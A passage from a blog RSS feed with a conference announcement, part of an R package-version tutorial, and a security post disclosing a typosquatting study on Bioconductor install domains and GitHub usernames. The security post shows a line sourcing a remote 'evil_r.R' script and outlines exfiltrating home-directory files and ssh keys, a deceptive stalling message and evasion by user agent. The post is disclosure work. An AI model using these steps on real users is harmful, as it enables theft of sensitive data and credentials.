&lt;/p&gt;</description></item><item><title>satRdays Newcastle 2019 Conference is Here!</title><link>https://www.jumpingrivers.com/blog/satrdays-newcastle-2019-conference/</link><pubDate>Fri, 25 Jan 2019 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/satrdays-newcastle-2019-conference/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/satrdays-newcastle-2019-conference/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/satrdays-newcastle-2019-conference/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;We are pleased to announce the very first &lt;a href="https://satrdays.org" rel="external"&gt;Satrday&lt;/a&gt; event in Newcastle upon Tyne (and England). &lt;a href="https://newcastle2019.satrdays.org/" rel="external"&gt;satRdays Newcastle&lt;/a&gt; is a one-day, low-cost, community organised R conference in the heart of Newcastle City Centre.&lt;/p&gt;
&lt;h2 id="where"&gt;Where?&lt;/h2&gt;
&lt;p&gt;The event will be held at &lt;a href="https://goo.gl/maps/MW26aGn6tN12" rel="external"&gt;Newcastle University&lt;/a&gt;. Getting to Newcastle is really easy&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Train: 90 minutes from Edinburgh or 3 hours from London. The train station is in the middle of Newcastle.&lt;/li&gt;
&lt;li&gt;Plane: Direct flights from Schiphol, Paris, Stansted, Heathrow, Dublin, Belfast. The airport is only 15 minutes from the city centre by taxi.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Of course, we won&amp;rsquo;t suggest you attend this conference and use it as an excuse for a holiday&amp;hellip;&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2019-satrdays-newcastle-2019-conference"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="when"&gt;When?&lt;/h2&gt;
&lt;p&gt;Saturday April 6th, 9am to 5pm&lt;/p&gt;
&lt;h2 id="who"&gt;Who?&lt;/h2&gt;
&lt;p&gt;Our keynote speakers include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;em&gt;Robin Lovelace&lt;/em&gt;, a Leeds University Academic Fellow&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Noa Tamir&lt;/em&gt;, Director of Data Science at the AUTO1 Group&lt;/li&gt;
&lt;li&gt;Guest speaker from RStudio TBA&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="how-much"&gt;How much?&lt;/h2&gt;
&lt;p&gt;Early bird tickets are on sale now for a very modest &lt;strong&gt;&lt;em&gt;£20&lt;/em&gt;&lt;/strong&gt;! (Yes you read that correctly). Hurry though, as the early bird promotion will end on 1st February, after which tickets will increase to £30.&lt;/p&gt;
&lt;h2 id="can-i-get-involved"&gt;Can I get involved?&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;&lt;em&gt;Yes&lt;/em&gt;&lt;/strong&gt;!&lt;/p&gt;
&lt;p&gt;If you want to speak we are accepting paper submissions for speakers right up until 16th February. Simply submit an &lt;a href="https://sessionize.com/satrdays-newcastle-2019" rel="external"&gt;abstract&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;If you need any more details, visit &lt;a href="https://newcastle2019.satrdays.org/" rel="external"&gt;newcastle2019.satRdays.org&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Cheers!&lt;/p&gt;
&lt;img class="image-center" src="newcastle-bridge.jpg" style="width:500px; class:image-center"&gt;
&lt;h3 id="picture-credit"&gt;Picture Credit&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.instagram.com/dbiltonphotography/" rel="external"&gt;Dan Bilton&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/satrdays-newcastle-2019-conference/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Hacking Bioconductor</title><link>https://www.jumpingrivers.com/blog/security-r-hacking-bioconductor/</link><pubDate>Mon, 19 Nov 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/security-r-hacking-bioconductor/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/security-r-hacking-bioconductor/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/security-r-hacking-bioconductor/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="introduction"&gt;Introduction&lt;/h2&gt;
&lt;p&gt;Domain squatting or URL hijacking is a straightforward attack that requires little skill. An attacker registers a domain that is similar to the target domain and hopes that a user accidentally visits the site. For example, if the domain is &lt;code&gt;example.com&lt;/code&gt;, then a typo-squatter would register similar domains such as&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;common misspelling: &lt;code&gt;examples.com&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;misspellings based on omitted letters: &lt;code&gt;exampl.com&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;misspellings based on typos: &lt;code&gt;ezample.com&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;a different top-level domain: &lt;code&gt;example.co.uk&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The cost of registering a single domain is approximately £10 for two years.&lt;/p&gt;
&lt;p&gt;With the rise of data science and the widespread use of tools such as R, Python and Matlab, programming has moved from the domain of computing scientist to users who have no formal training. Coupled with this, is the vast amount of additional free packages available. For example, R has over 12,000 packages on its main repository CRAN. These packages cover everything from clinical trials to machine learning. Installation of these packages does not go through a traditional IT approach, where a user contacts their IT officer asking for packages to be installed. Instead, users simply install the required packages on their own machine. Crucially, to install these packages does not require admin rights. This shift from a centrally managed IT infrastructure to a user-centred approach can be difficult to manage.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2018-security-r-hacking-bioconductor"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="example-bioconductor-project"&gt;Example: Bioconductor project&lt;/h2&gt;
&lt;p&gt;To make this article concrete, while simultaneously not overstepping the ethical bounds, we used URL hijacking to target &lt;a href="https://bioconductor.org/" rel="external"&gt;Bioconductor&lt;/a&gt;. The Bioconductor project provides tools for the analysis and understanding of high-throughput genomic data. The project uses the R programming language and has over 1,300 associated R packages.&lt;/p&gt;
&lt;p&gt;To install Bioconductor, users are instructed to run the R script&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;source&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;https://bioconductor.org/biocLite.R&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This loads the &lt;code&gt;biocLite()&lt;/code&gt; function that enables installation of other R packages. Two points are worth noting:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Bioconductor has a large user community.&lt;/li&gt;
&lt;li&gt;The typical Bioconductor user is analysing cutting-edge biological datasets and therefore likely to be in a University, pharmaceutical company, or government agency. Their data is almost certainly sensitive, which could include patient data or results on upcoming drug trials.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We registered eleven domains: biconductor.org, biocnductor.org, biocoductor.org, biocondctor.org, bioconducor.org, bioconducto.org, bioconductr.org, biocondutor.org, bioconuctor.org, bioonductor.org, boconductor.org&lt;/p&gt;
&lt;p&gt;Each domain name is a simple misspelling of &lt;strong&gt;bioconductor&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;When the &lt;code&gt;source()&lt;/code&gt; function is used to access a website, it sends a &lt;em&gt;user agent&lt;/em&gt; giving the version of R being used and the operating system. For example, the user agent&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;R (3.4.2 x86_64-w64-mingw32 x86_64 mingw32)&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;indicates R version 3.4.2 on a Windows machine. The machine&amp;rsquo;s location (IP address) is also passed to the server. Whenever a machine accesses a domain, this information is automatically recorded.&lt;/p&gt;
&lt;p&gt;For each of the eleven domains, we monitored the server logs for occurrences of the R user-agent. Whenever anyone accessed our rogue domains we always returned a 404 (not found) error message. It is worth noting that while SSL (&lt;strong&gt;https&lt;/strong&gt;) is essential for a secure connection, in this scenario it just provides a secure connection to the rogue domain, i.e. it does not offer any additional protection.&lt;/p&gt;
&lt;h3 id="did-it-work"&gt;Did it work?&lt;/h3&gt;
&lt;p&gt;We monitored the eleven domains for five months, starting in January 2018. As expected some domains are clearly more popular than others. The top three domains, bioconducor.org, biconductor.org and biocondutor.org accounted for most of the traffic.&lt;/p&gt;
&lt;img class="image-center" src="blog-security.png" style="width:550px; class:image-center"&gt;
&lt;p&gt;To avoid duplication, a particular IP address is only counted once per day. Only hits that had the R-user agent are counted.&lt;/p&gt;
&lt;p&gt;A summary of the results are&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Thirty-three countries&lt;/li&gt;
&lt;li&gt;168 unique Universities, with most of the top 10 Universities in the world represented&lt;/li&gt;
&lt;li&gt;Many Research Institutes&lt;/li&gt;
&lt;li&gt;A number of Pharma companies and charities&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="is-it-really-a-big-deal"&gt;Is it really a big deal?&lt;/h3&gt;
&lt;p&gt;Once the user has executed our R script, we are free to run any R commands we wish. If the attacker has targeted users installing Bioconductor then they would probably look for commercially sensitive material.&lt;/p&gt;
&lt;p&gt;The first step for an attacker to retrieve information from a user&amp;rsquo;s machine would be to install the {httr} R package using the command&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;httr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This package provides functionality for uploading files to external web-servers. A more nefarious technique would be to detect if Dropbox or other cloud storage system is on their system and leverage that via an associated R package.&lt;/p&gt;
&lt;p&gt;The next step would be to determine files on the system. This is particularly easy since R is cross-platform. Using base R, we can list all files under a users home area with&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;list.files&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;~/&amp;#34;&lt;/span&gt;, recursive &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;, full.names &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;An attacker could either upload all files or cherry-pick particular directories, such as those that contain security credentials, e.g. ssh keys. With approximately three lines of standard R code the attacker we could upload all files from a user&amp;rsquo;s home area to an external server.&lt;/p&gt;
&lt;p&gt;An attacker could nuance their attack with little thought. For example, a simple message statement at the start of an attack, such as&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;The Bioconductor server is experiencing heavy use today;
hence the installation process will take slightly longer than usual,
please be patient. Sorry for your inconvenience.
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;would give the attacker more time. A sophisticated variation would be to delay file uploads until the user is away from the computer, while simultaneously installing Bioconductor and allowing the user to proceed as normal.&lt;/p&gt;
&lt;p&gt;Detecting an attack would also be difficult as an attacker can modify their response based on the user-agent. For example, if in R we run the command&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;source&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;http://www.mas.ncl.ac.uk/~ncsg3/R/evil_r.R&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The server detects an R user agent and returns R code. However visiting the site via a browser, such as Internet Explorer, will result in a ``page not found&amp;rsquo;&amp;rsquo;. An attacker could also cache IP addresses of visitors. This would enable them to launch an attack the first time a user visits the page, but all subsequent visits result in a redirect to the correct Bioconductor site.&lt;/p&gt;
&lt;h2 id="other-attack-avenues"&gt;Other Attack Avenues&lt;/h2&gt;
&lt;p&gt;Bioconductor is not the only attack vector that could be exploited. Many R users install the latest versions of packages from GitHub (or other online repositories). The most common method of installing a GitHub package is to use the function &lt;code&gt;install_github()&lt;/code&gt;. The first argument of this function is a combination of the GitHub username and the repository name. For example, to install the latest version of {ggplot2} package, the user/organisation is {tidyverse} and the repository name is {ggplot2}, so the argument to the &lt;code&gt;install_github()&lt;/code&gt; function would be &lt;strong&gt;tidyverse/ggplot2&lt;/strong&gt;, i.e. thus&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install_github&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidyverse/ggplot2&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;As with the mechanism employed by Bioconductor, there is nothing wrong with this particular method for package installation. However like Bioconductor, as there are many users installing the package in this manner, it would be relatively simple to register a similar username; we have actually registered the username {tidyverse} but didn&amp;rsquo;t create a {ggplot2} repository.&lt;/p&gt;
&lt;p&gt;While the {tidyverse} repository is one of the most popular GitHub repositories, it would be relatively easy to script an attack on &lt;strong&gt;all&lt;/strong&gt; packages hosted in &lt;a href="https://rpkg-api.gepuro.net/rpkg" rel="external"&gt;GitHub&lt;/a&gt;. Creating similar user-names and cloning the targeted repositories, would create thousands of possible attack vectors.&lt;/p&gt;
&lt;p&gt;This security vulnerability is implicitly present whenever a user installs packages or libraries. For example in &lt;a href="https://python.org" rel="external"&gt;Python&lt;/a&gt;, users can install packages via the popular _pip__ package. However, a malicious attacker can upload a python package to this repository with a similar name to a current package and thereby gain control of a users system via URL hijacking.&lt;/p&gt;
&lt;h2 id="reporting-vulnerabilities"&gt;Reporting vulnerabilities&lt;/h2&gt;
&lt;p&gt;We actually discovered this issue mid-way through 2017. After contacting the maintainers of Bioconductor, we waited until the mechanism for installing Bioconductor packages was changed to&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## A CRAN package&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;BiocManager&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This happened with the release of R 3.5.0. We then waited a few more months just to be sure&lt;/p&gt;
&lt;h2 id="shiny-and-r-health-checks"&gt;Shiny and R Health Checks&lt;/h2&gt;
&lt;p&gt;One of our main tasks at &lt;a href="https://www.jumpingrivers.com/consultancy/" rel="external"&gt;Jumping Rivers&lt;/a&gt; is to help set up &lt;a href="https://www.r-project.org/" rel="external"&gt;R&lt;/a&gt; infrastructure and perform R related security health checks. If you need advice or help, please &lt;a href="https://jumpingrivers.com/contact?utm_source=blog&amp;utm_medium=contact&amp;utm_campaign=2018-bioconductor" rel="external"&gt;contact&lt;/a&gt; us for further details.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/security-r-hacking-bioconductor/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>What R version do you really need for a package?</title><link>https://www.jumpingrivers.com/blog/what-r-version-do-you-really-need-for-a-package/</link><pubDate>Thu, 01 Nov 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/what-r-version-do-you-really-need-for-a-package/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/what-r-version-do-you-really-need-for-a-package/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/what-r-version-do-you-really-need-for-a-package/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;At &lt;a href="https://www.jumpingrivers.com" rel="external"&gt;Jumping Rivers&lt;/a&gt; we run a lot of R courses. Some of our most popular courses revolve around the &lt;a href="https://www.tidyverse.org/" rel="external"&gt;tidyverse&lt;/a&gt;, in particular, our &lt;a href="https://www.jumpingrivers.com/training/course/data-tidyverse-dplyr-tidyr-lubridate-forcats/"&gt;Data Wrangling in the Tidyverse&lt;/a&gt; and our more advanced &lt;a href="https://www.jumpingrivers.com/training/course/r-tidyverse-programming-purrr-lists/"&gt;purrr&lt;/a&gt; course. We even trained over 200 data scientists NHS - see our &lt;a href="https://www.jumpingrivers.com/case-studies/nhs-scotland-r-training" rel="external"&gt;case study&lt;/a&gt; for more details.&lt;/p&gt;
&lt;p&gt;As you can imagine, when giving an on-site course, a reasonable question is what version of R is required for the course. We &lt;strong&gt;always&lt;/strong&gt; have an RStudio cloud back-up, but it’s nice for participants to run code on their own laptop. If participants are to bring there own laptop it’s trivial for them to update R. But many of our clients are financial institutions or government where an upgrade is a non-trivial process.&lt;/p&gt;
&lt;p&gt;So, what version of R is required for a &lt;em&gt;tidyverse&lt;/em&gt; course? For the purposes of this blog post, we will define the list of packages we are interested in as&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidyverse&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tidy_pkgs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ggplot2&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;purrr&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;tibble&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;dplyr&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;tidyr&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;stringr&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;readr&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;forcats&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The code below will work with &lt;strong&gt;any&lt;/strong&gt; packages of interest. In fact, you can set &lt;code&gt;pkgs&lt;/code&gt; to all R packages in CRAN, it just takes a while.&lt;/p&gt;
&lt;h2 id="package-descriptions"&gt;Package descriptions&lt;/h2&gt;
&lt;p&gt;In R, there is a handy function called &lt;code&gt;available.packages()&lt;/code&gt; that returns a matrix of details corresponding to packages currently available at one or more repositories. Unfortunately, the format isn’t initially amenable to manipulation. For example, consider the {readr} package&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;readr_desc &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;available.packages&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as_tibble&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(Package &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;readr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;I immediately converted the data to a tibble, as that&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;changed the rownames to a proper column&lt;/li&gt;
&lt;li&gt;changed the matrix to a data frame/tibble, which made selecting easier&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Looking at the &lt;code&gt;read_desc&lt;/code&gt;, we see that it has a minimum R version&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;readr_desc&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Depends
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;R (&amp;gt;= 3.0.2)&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;but due to the format, it would be difficult to compare to R versions. Also, the list of imports&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;readr_desc&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Imports
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;Rcpp (&amp;gt;= 0.12.0.5), tibble, hms, R6&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;has a similar problem. For example, with the data in this format, it would be difficult to select packages that depend on {tibble}.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2018-what-r-version-do-you-really-need-for-a-package"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="tidy-package-descriptions"&gt;Tidy package descriptions&lt;/h2&gt;
&lt;p&gt;We currently have four columns&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Imports, Depends, Suggests, Enhances&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;each entry in these columns contains multiple packages, with possible version numbers. To tidy the data set I’m going to create four new columns:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;depend_type&lt;/code&gt;: one of Imports, Depends, Suggests, Enhances and LinkingTo&lt;/li&gt;
&lt;li&gt;&lt;code&gt;depend_package&lt;/code&gt;: the package name&lt;/li&gt;
&lt;li&gt;&lt;code&gt;depend_version&lt;/code&gt;: the package version&lt;/li&gt;
&lt;li&gt;&lt;code&gt;depend_condition&lt;/code&gt;: something like equal to, less than or greater than&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The hard work is done by the function &lt;code&gt;clean_dependencies()&lt;/code&gt;, which is at the end of the blog post. It essentially just does a bit of string manipulation to separate out the columns. The function works per package, so we iterate over packages using &lt;code&gt;map_df()&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pkg_deps &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Depends&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Enhances&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Suggests&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Imports&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;LinkingTo&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;av_pkgs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;available.packages&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as_tibble&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;av_pkgs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;map_df&lt;/span&gt;(pkg_deps, clean_dependencies, av_pkgs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; av_pkgs) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;pkg_deps)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Std version: 3.4 -&amp;gt; 3.4.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;av_pkgs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; av_pkgs &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
